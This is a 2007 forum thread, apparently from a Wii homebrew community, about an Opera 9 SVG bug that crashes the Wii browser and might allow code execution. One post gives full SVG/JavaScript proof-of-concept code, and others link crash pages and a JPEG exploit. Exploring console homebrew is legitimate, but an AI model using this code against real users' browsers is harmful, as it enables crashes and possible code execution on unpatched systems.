| View previous topic :: View next topic |
| Author |
Message |
TheGreatBradley
Joined: 11 Nov 2006
Posts: 19
Location: Michigan
Digg It |
 Posted: Sun Jan 07, 2007 7:03 am Post subject: Noted Opera bug: Arbitrary code execution. Possible on Wii? |
|
|
According to this and this, the version of Opera (9.0x, which is available on PC's, but is also the version the Wii uses) has a big bug that allows arbitrary code execution to be done via the usage of scalable vector graphics and javascript by using the "createSVGTransformFromMatrix" function. (Read more about it on the link above.)
As of this being noted, a website arose dedicating itself to this error. Go to thehumancircus.org for more information about this, and a page that will crash your Wii using this flaw.
Just wondering if this exploit could help us with the Wii.
Input
_________________
--Bradley
 |
|
| Back to top |
|
 |
LiquidIce
Joined: 22 Nov 2006
Posts: 36
Digg It |
| Posted: Sun Jan 07, 2007 4:37 pm Post subject: |
|
|
Very interesting. Looks like the hackers are hard at work with this one.
I can confirm it does crash the browser. There are some 'Crash My Wii' links on the Wii Portal Page here if you want to try it on your own Wii:
http://team-dsx.net/wii/portal
trapflag on IRC is looking at the registers to find ways to execute code:
http://paste.uni.cc/12615
Will keep my eyes on this one as it progresses today.
_________________
-LiquidIce
LiquidIce's Wii Hacks
http://wiihacks.blogspot.com |
|
| Back to top |
|
|
Matti-Koopa
Joined: 04 Jan 2007
Posts: 66
Digg It |
| Posted: Sun Jan 07, 2007 5:07 pm Post subject: |
|
|
There are many sites that hungs-up your Wii.
Mine did it about 5 times...
Often when you use WiiTabs Beta (if you want the link ask)... |
|
| Back to top |
|
|
wiili
Site Admin
Joined: 05 Nov 2006
Posts: 46
Digg It |
| Posted: Tue Jan 09, 2007 1:49 am Post subject: |
|
|
Here's the code:
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN"
"http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg id="mySVG" width="100%" height="100%" version="1.1"
xmlns="http://www.w3.org/2000/svg">
<rect width="300" height="100"
style="fill:rgb(0,0,255);stroke-width:1;
stroke:rgb(0,0,0)"/>
<script>
var svg = document.getElementById("mySVG");
var matrix = svg.createSVGMatrix();
var i=0xffffffff, randomObject = {a:i,b:i,c:i,d:i,e:i,f:i};
try{
svg.createSVGTransformFromMatrix(matrix);
}catch(e){}
try{
svg.createSVGTransformFromMatrix(randomObject);
}catch(e){}
try{
svg.createSVGTransformFromMatrix(null);
}catch(e){}
try{
svg.createSVGTransformFromMatrix(i);
}catch(e){}
try{
svg.createSVGTransformFromMatrix(new Array(i));
}catch(e){}
</script>
</svg> |
|
| Back to top |
|
|
LiquidIce
Joined: 22 Nov 2006
Posts: 36
Digg It |
| Posted: Tue Jan 09, 2007 6:39 pm Post subject: |
|
|
If you navigate your Wii Browser to this image, it will restart Opera:
http://img1.imagefuse.com/anon/11683629302.jpg
The bottom bar goes away, a grey screen appears then it reloads the bar and jumps back to the homepage
Let the fun begin! Thanks to ThE_OnE for pointing this out.
_________________
-LiquidIce
LiquidIce's Wii Hacks
http://wiihacks.blogspot.com |
|
| Back to top |
|
|
tuxido
Site Admin
Joined: 05 Nov 2006
Posts: 150
Digg It |
| Posted: Tue Jan 09, 2007 8:28 pm Post subject: |
|
|
| Please let's be very careful when posting links. Code exec is around the corner. |
|
| Back to top |
|
|
TheGreatBradley
Joined: 11 Nov 2006
Posts: 19
Location: Michigan
Digg It |
| Posted: Thu Jan 11, 2007 4:08 am Post subject: |
|
|
Looks like thehumancircus.org added some .jpeg vulnerability tests on their site. I haven't had a change to try them out yet. Anyone test them yet to find out what they do?
Heres a site explaining how to make .jpeg's with the exploit in them. As of now, no one has figured out how to use this in a way to help us with homebrew at the moment. http://milw0rm.com/exploits/3101
_________________
--Bradley
|
|
| Back to top |
|
|
|
FAQ
Search
Memberlist
Usergroups
Register
Profile
Log in to check your private messages
Log in
